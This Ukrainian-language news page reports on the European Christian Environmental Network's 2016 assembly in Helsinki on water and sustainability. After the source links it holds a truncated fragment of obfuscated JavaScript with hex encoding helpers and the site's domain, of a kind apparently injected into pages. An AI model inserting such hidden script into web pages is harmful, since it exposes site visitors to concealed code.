Вода у сталому майбутньому » Інститут еколого-релігійних студій

Вода у сталому майбутньому 18-06-2016, 19:01

       

Більш, ніж 80 осіб з 23 європейських країн вирушили в Гельсінкі на 11-у Ассамблею Європейської Християнської Екологічної Мережі. 11-а Ассамблея Європейської Християнської Екологічної Мережі відбулася у «Центрі Культури Софія» в Гельсінкі з 11 по 15 червня. Більше 80 делегатів з 23 країн з усіх регіонів Європи зібралися на час молитви, обговорення, і налагодження співпраці. Ассамблея відбулася незабаром після історичної Паризької угоди про зміни клімату. Тема «Вода у сталому майбутньому» розвинулася навколо взаємозв’язку між змінами клімату, водним циклом та зусиллями щодо забезпечення сталого розвитку. Ассамблея запропонувала місце для обміну інформацією та зміцнення співробітництва, а також для подальшого заохочення роботи Церков в епоху «постпарижської угоди». У презентаціях тема була розглянута з наукової, політичної та теологічної точок зору. Вступна презентація преподобного Грехема Ушера, єпископа Дадлі (Церква Англії) підкреслює біблійне і священне значення води в християнській традиції. Крім того, конференція дала можливість експертам, що зібралися на ній, обговорити дії Церкви у сфері змін клімату з церковними лідерами Фінляндії. Протягом усієї Ассамблеї тривало тісне співробітництво з церквами в Фінляндії, включаючи ключові виступи архієпископа Карі Мякинен (Євангелічно-Лютеранська церква Фінляндії) і єпископа Ір´я Аскола, єпископа Гельсінкі (Євангелічно-Лютеранська церква в Фінляндії). Митрополит Гельсінкі Амбросіус (Фінляндська Православна Церква) викликає особливий інтерес у цій групі. Він запропонував спеціальні вітання делегатів ECEN під час літургії в Успенському соборі в неділю, запропонував ранкові молитви в Софії, а також брав участь в засіданні щодо розгляду основної резолюції. Євангелічно-Лютеранський Собор в Гельсінкі і Римсько-Католицький Собор в Сент-Генрі також тепло зустріли візити делегатів ECEN під час ранкових богослужінь. В кінці Ассамблеї учасники схвалили резолюцію, підкреслюючи богословське та біблійне обов´язкове покликання працювати у сфері води та закликати до дії людей і церкви. Ряд делегатів з екуменічних молодіжних організацій і ECEN взяли на себе зобов'язання щодо розширення участі молоді в роботі мережі.

Джерело інформації: http://www.ecen.org/

http://www.ecen.org/

http://www.ecen.org/content/11th-assembly-outcome-statement-ecen-2016-%E2%80%93-helsinki
 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ie-rs.org"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
Шановний відвідувач, Ви зайшли на сайт як незареєстрований користувач. Ми рекомендуємо Вам зареєструватись або зайти на сайт під своїм іменем.

Інші новини по темі:

  • Десята ювілейна асамблея Європейської х ...
  • Прес-реліз ССЕЕ: «Церква має фундаментал ...
  • Папа проголосив екологічну святу Вчител ...
  • На Львіщині роздумували про сімейну екол ...
  • Церкви Європи з нагоди дня молитви за ств ...


  • Додавання коментаря